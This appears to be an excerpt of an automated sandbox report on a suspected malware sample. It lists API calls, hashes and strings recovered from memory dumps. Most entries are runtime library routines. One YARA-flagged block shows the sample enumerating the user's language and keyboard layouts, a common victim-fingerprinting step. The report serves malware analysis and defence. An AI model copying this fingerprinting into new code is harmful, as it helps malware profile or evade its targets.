                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3907804496
                                          • Opcode ID: 139ec6c71f8704d97e795986ed9d27e5e6cac3b53f348087f22254b577c56d57
                                          • Instruction ID: 465edd7e254de6cc741af5f6d54dcd65af044e67244822519ee13bf5b28131a5
                                          • Opcode Fuzzy Hash: 139ec6c71f8704d97e795986ed9d27e5e6cac3b53f348087f22254b577c56d57
                                          • Instruction Fuzzy Hash: 34B124B0E05289DFDB11DF9AC882BBD7BB1BF4D314F984159E4019B392C7789952CB60
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 007D2DE7
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 007D2DEF
                                          • _ValidateLocalCookies.LIBCMT ref: 007D2E78
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 007D2EA3
                                          • _ValidateLocalCookies.LIBCMT ref: 007D2EF8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: fbc6b45ee88655536bbe67d86afce7f706716a24126e87323b796c397af4cac2
                                          • Instruction ID: c2a9ea159c31b3c5e989d35903fa97d9829318bd287f9137fee2eada75468ab2
                                          • Opcode Fuzzy Hash: fbc6b45ee88655536bbe67d86afce7f706716a24126e87323b796c397af4cac2
                                          • Instruction Fuzzy Hash: 0741A634A00249EBCF10DF69C888A9EBBB5FF55314F148156E9185B392D739DE07CB91
                                          APIs
                                          • GetUserDefaultUILanguage.KERNEL32 ref: 038F1F90
                                          • GetKeyboardLayoutList.USER32(00000032,?), ref: 038F1FF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DefaultKeyboardLanguageLayoutListUser
                                          • String ID: )$- KeyboardLayouts: ( $- SystemLayout %d${%d}
                                          • API String ID: 167087913-619012376
                                          • Opcode ID: 9e3695e24b84e8a09d9cacabfea081b7fea217a374f5bba2033b846ac27999a8
                                          • Instruction ID: f7183a3fb724f4e30045a656a81a2fae9145d558e94857187e83058264ab03ac
                                          • Opcode Fuzzy Hash: 9e3695e24b84e8a09d9cacabfea081b7fea217a374f5bba2033b846ac27999a8
                                          • Instruction Fuzzy Hash: D2318F54E08298AEEB01DFE894017FDBB70EF14305F4054D6FA48EA282D77D4B55C76A
                                          APIs
                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,D70AE4BB,?,007DDEA3,00000000,007713A5,00000000,00000000), ref: 007DDE55
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID: api-ms-$ext-ms-
                                          • API String ID: 3664257935-537541572
                                          • Opcode ID: c4280d2d53c52acd790af51b1d9199623e536c0b5e8e3caceb4f4e9f80388299
                                          • Instruction ID: 0df0775416630269a86eddacc26077169282170ced6fa46c2342ac6e421b21fd
                                          • Opcode Fuzzy Hash: c4280d2d53c52acd790af51b1d9199623e536c0b5e8e3caceb4f4e9f80388299
                                          • Instruction Fuzzy Hash: FA212472A01211ABCB319B65EC84B6B3778EF557A0F244116EA16AF3D0E73CED00C6E4
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 007CE51D
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 007CE527
                                          • int.LIBCPMTD ref: 007CE53E
                                            • Part of subcall function 007746D0: std::_Lockit::_Lockit.LIBCPMT ref: 007746E6
                                            • Part of subcall function 007746D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00774710
                                          • codecvt.LIBCPMT ref: 007CE561
                                          • std::_Facet_Register.LIBCPMT ref: 007CE578
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 007CE598
                                          • Concurrency::cancel_current_task.LIBCPMTD ref: 007CE5A5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                          • String ID:
                                          • API String ID: 2133458128-0
                                          • Opcode ID: c9af2895e76a33ff391b3e27c95bceee06c869b162da651d5e9d3461059b5b15
                                          • Instruction ID: d28378545dcea6c8360fc619fa5e15a17d05ac081cae270c6da63b3f9a68a3c2
                                          • Opcode Fuzzy Hash: c9af2895e76a33ff391b3e27c95bceee06c869b162da651d5e9d3461059b5b15
                                          • Instruction Fuzzy Hash: 8311B4B1900619DFCB11ABA4D849BAE77B5FF44720F14440DF40597281EFBCAE11CB91
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 007CD7AF
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 007CD7B9
                                          • int.LIBCPMTD ref: 007CD7D0
                                            • Part of subcall function 007746D0: std::_Lockit::_Lockit.LIBCPMT ref: 007746E6
                                            • Part of subcall function 007746D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00774710
                                          • codecvt.LIBCPMT ref: 007CD7F3
                                          • std::_Facet_Register.LIBCPMT ref: 007CD80A
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 007CD82A
                                          • Concurrency::cancel_current_task.LIBCPMTD ref: 007CD837
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                          • String ID:
                                          • API String ID: 2133458128-0
                                          • Opcode ID: 03373f5b64e578b130d60955201d0c5bf4b05f76e1bf85bbbbb8b3a7aaaaf53c
                                          • Instruction ID: 12a31de089acf6c3cc29c0e9c0a311fc761de5c2ea95d124b1341464e811c204
                                          • Opcode Fuzzy Hash: 03373f5b64e578b130d60955201d0c5bf4b05f76e1bf85bbbbb8b3a7aaaaf53c
                                          • Instruction Fuzzy Hash: 6201ADB590011ADBCF11BBA4C849BBE77B2AF84310F14401DE415AB281DF7C9E01CBC1
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 007CF927
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 007CF992
                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007CF9AF
                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 007CF9EE
                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007CFA4D
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 007CFA70
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiStringWide
                                          • String ID:
                                          • API String ID: 2829165498-0
                                          • Opcode ID: 17c2f7509b393aa6db66e4c5a14b374a210dc27efde8214299ce2fe159ed20bb
                                          • Instruction ID: 2747bae085b5bce6fcbeb74188e70d600e878ef94c0600449a7bc6b879a9a034
                                          • Opcode Fuzzy Hash: 17c2f7509b393aa6db66e4c5a14b374a210dc27efde8214299ce2fe159ed20bb
                                          • Instruction Fuzzy Hash: 9D517F7250021AFBDF209FA4CC85FAEBBBAEB45750F15852DF909EA150D7789910CB50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: x
                                          • API String ID: 0-2363233923
                                          • Opcode ID: de6962e585e8bc2132afb62c464bea8710c40f06c0679ec910e430ed5d1dc03b
                                          • Instruction ID: f0e9134a0d6659b527078826573309a0ee707e78400906ff24740064f1e78fd0
                                          • Opcode Fuzzy Hash: de6962e585e8bc2132afb62c464bea8710c40f06c0679ec910e430ed5d1dc03b
                                          • Instruction Fuzzy Hash: 5C02AC78E00609EFCB41DFA8C984AADB7F4FF09305F1484A6E966EB250D770AA51CF51
                                          APIs
                                          • GetLastError.KERNEL32(?,?,007D2FA1,007D16DC,007D0672), ref: 007D2FB8
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007D2FC6
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007D2FDF
                                          • SetLastError.KERNEL32(00000000,007D2FA1,007D16DC,007D0672), ref: 007D3031
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 2d1aab959126a954e110e75b37ac77c545aa8dc790cf5f83efdbbcce18639831
                                          • Instruction ID: 00624b0cff26e524b602c1f80d38e688ccf47d823b8acff7758a11753fbf3b05
                                          • Opcode Fuzzy Hash: 2d1aab959126a954e110e75b37ac77c545aa8dc790cf5f83efdbbcce18639831
                                          • Instruction Fuzzy Hash: F401D872109321BE96252B78BD89B2B2775EB617B0720432BF114953E1FE6E4C01924A
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,D70AE4BB,?,?,00000000,007E8AEC,000000FF,?,007D80A8,?,?,007D807C,00000000), ref: 007D8101
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007D8113
                                          • FreeLibrary.KERNEL32(00000000,?,00000000,007E8AEC,000000FF,?,007D80A8,?,?,007D807C,00000000), ref: 007D8135
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: e06b097b7dcd22dc610755165f7d3105cd9574facb29c48d81b6455936aa0ce4
                                          • Instruction ID: 3710ab23da2067abc0d29f125130692535706dd87ad757d698391bbd0952f4f4
                                          • Opcode Fuzzy Hash: e06b097b7dcd22dc610755165f7d3105cd9574facb29c48d81b6455936aa0ce4
                                          • Instruction Fuzzy Hash: 6601A772505569EFCB119F51CC45BAFBBB8FB0C710F00452AE911A22A0EF7D9800CA65
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00771E40
                                          • int.LIBCPMTD ref: 00771E59
                                            • Part of subcall function 007746D0: std::_Lockit::_Lockit.LIBCPMT ref: 007746E6
                                            • Part of subcall function 007746D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00774710
                                          • Concurrency::cancel_current_task.LIBCPMTD ref: 00771E99
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00771F01
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                          • String ID:
                                          • API String ID: 3053331623-0
                                          • Opcode ID: f1f6fa881a8de4618a56146c31bad7a19c3d9a46f0c9165eb3c8fd8d3712ed68
                                          • Instruction ID: 8b24a29ea8149e390c881ee91d027c35b18f0992b39a405f1471eb6573f3a980
                                          • Opcode Fuzzy Hash: f1f6fa881a8de4618a56146c31bad7a19c3d9a46f0c9165eb3c8fd8d3712ed68
                                          • Instruction Fuzzy Hash: FC312EB0D00249DBCF04EF98D995BEEB7B4BF08310F608219E91567391DB785A44CBA1
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00771F40
                                          • int.LIBCPMTD ref: 00771F59
                                            • Part of subcall function 007746D0: std::_Lockit::_Lockit.LIBCPMT ref: 007746E6
                                            • Part of subcall function 007746D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00774710
                                          • Concurrency::cancel_current_task.LIBCPMTD ref: 00771F99
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00772001
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                          • String ID:
                                          • API String ID: 3053331623-0
                                          • Opcode ID: a36e266e7a1176c8744d56264779aeab9a43b38e2d2cb550e2181579220d6bda
                                          • Instruction ID: 34f6488eb2e5476660ff33fe989d61787efbb02a7e930e6f13702130d9e5b487
                                          • Opcode Fuzzy Hash: a36e266e7a1176c8744d56264779aeab9a43b38e2d2cb550e2181579220d6bda
                                          • Instruction Fuzzy Hash: 02312BB1D00249DFCF14EF98D985BEEBBB4BF08310F208219E51567391DB386A04CBA1
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 007CCE44
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 007CCE4F
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 007CCEBD
                                            • Part of subcall function 007CCFA0: std::locale::_Locimp::_Locimp.LIBCPMT ref: 007CCFB8
                                          • std::locale::_Setgloballocale.LIBCPMT ref: 007CCE6A
                                          • _Yarn.LIBCPMT ref: 007CCE80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                          • String ID:
                                          • API String ID: 1088826258-0
                                          • Opcode ID: f18bb5cf51b06ab0701104b16046a8cfe5abcdc96f2573dad74db346e83da432
                                          • Instruction ID: 255b7025218a0d860f9050b8605a8a9e8a6098fc6076e86a76015c68f2fb4086
                                          • Opcode Fuzzy Hash: f18bb5cf51b06ab0701104b16046a8cfe5abcdc96f2573dad74db346e83da432
                                          • Instruction Fuzzy Hash: 06017CB6A01255DBC706AF60D899B7D7B62BF89340B18801DE90657381DF7CAE42CBC9
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,007D4023,00000000,?,007FB824,?,?,?,007D41C6,00000004,InitializeCriticalSectionEx,007EB270,InitializeCriticalSectionEx), ref: 007D407F
                                          • GetLastError.KERNEL32(?,007D4023,00000000,?,007FB824,?,?,?,007D41C6,00000004,InitializeCriticalSectionEx,007EB270,InitializeCriticalSectionEx,00000000,?,007D3F7D), ref: 007D4089
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 007D40B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID: api-ms-
                                          • API String ID: 3177248105-2084034818
                                          • Opcode ID: e463b00969a01edbdfc5ff4973f9768cb3561c33018f7ccea8923eb80a578794
                                          • Instruction ID: d4ceec464d52ff344ae940dc468e632767a1e148d9d24e7bdb63c3eb07d5a1e9
                                          • Opcode Fuzzy Hash: e463b00969a01edbdfc5ff4973f9768cb3561c33018f7ccea8923eb80a578794
                                          • Instruction Fuzzy Hash: 6DE04F31680245BBEF202B61EC46B993FB8AB04B51F508061FF0CEC1E1D7BAD9509AD9
                                          APIs
                                          • GetConsoleOutputCP.KERNEL32(D70AE4BB,00000000,00000000,00000000), ref: 007DF4FA
                                            • Part of subcall function 007E1EBD: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,007DEF8D,?,00000000,-00000008), ref: 007E1F1E
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 007DF74C
                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 007DF792
                                          • GetLastError.KERNEL32 ref: 007DF835
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                          • String ID:
                                          • API String ID: 2112829910-0
                                          • Opcode ID: eea984f19fdad07a27af921a82cf74c8cf14f19ab3010f938c9dc15ab5fbf9ac
                                          • Instruction ID: 8e379e9b1157b8b231d4b36af539ab2ababefcdd0e13b82e29fb1c6265982fa6
                                          • Opcode Fuzzy Hash: eea984f19fdad07a27af921a82cf74c8cf14f19ab3010f938c9dc15ab5fbf9ac
                                          • Instruction Fuzzy Hash: 38D16BB5D00249DFCB15CFA8D884AEDBBB5FF09314F24812AE826EB355D734A942CB50
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: AdjustPointer
                                          • String ID:
                                          • API String ID: 1740715915-0
                                          • Opcode ID: ccb4314720937ac7c17f30649981ba1c877acab949ca56fa9c5b88c9fa849062
                                          • Instruction ID: 5ed1090e5c9196a242971d9f71fbb7637678d33884156e981f4bec32bab568aa
                                          • Opcode Fuzzy Hash: ccb4314720937ac7c17f30649981ba1c877acab949ca56fa9c5b88c9fa849062
                                          • Instruction Fuzzy Hash: C551DF72604A0BEFEB298F14D855B6AB7B5EF44310F14452FE80687391E73AEE41C792
                                          APIs
                                            • Part of subcall function 007E1EBD: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,007DEF8D,?,00000000,-00000008), ref: 007E1F1E
                                          • GetLastError.KERNEL32 ref: 007E22DE
                                          • __dosmaperr.LIBCMT ref: 007E22E5
                                          • GetLastError.KERNEL32(?,?,?,?), ref: 007E231F
                                          • __dosmaperr.LIBCMT ref: 007E2326
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 1913693674-0
                                          • Opcode ID: 49e09a6751e470426fc0f14c16475ea1dee2f00a5fa6922873abd948a0a6f48f
                                          • Instruction ID: b390538f6cb4ae2f5819a03f9c8629952d2d98f1596b2b14ea6ae059494834ea
                                          • Opcode Fuzzy Hash: 49e09a6751e470426fc0f14c16475ea1dee2f00a5fa6922873abd948a0a6f48f
                                          • Instruction Fuzzy Hash: 7421DA31605645EFDB20AF66888586BB7BDFF0C3647108919F929D7252D77CED02CB60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
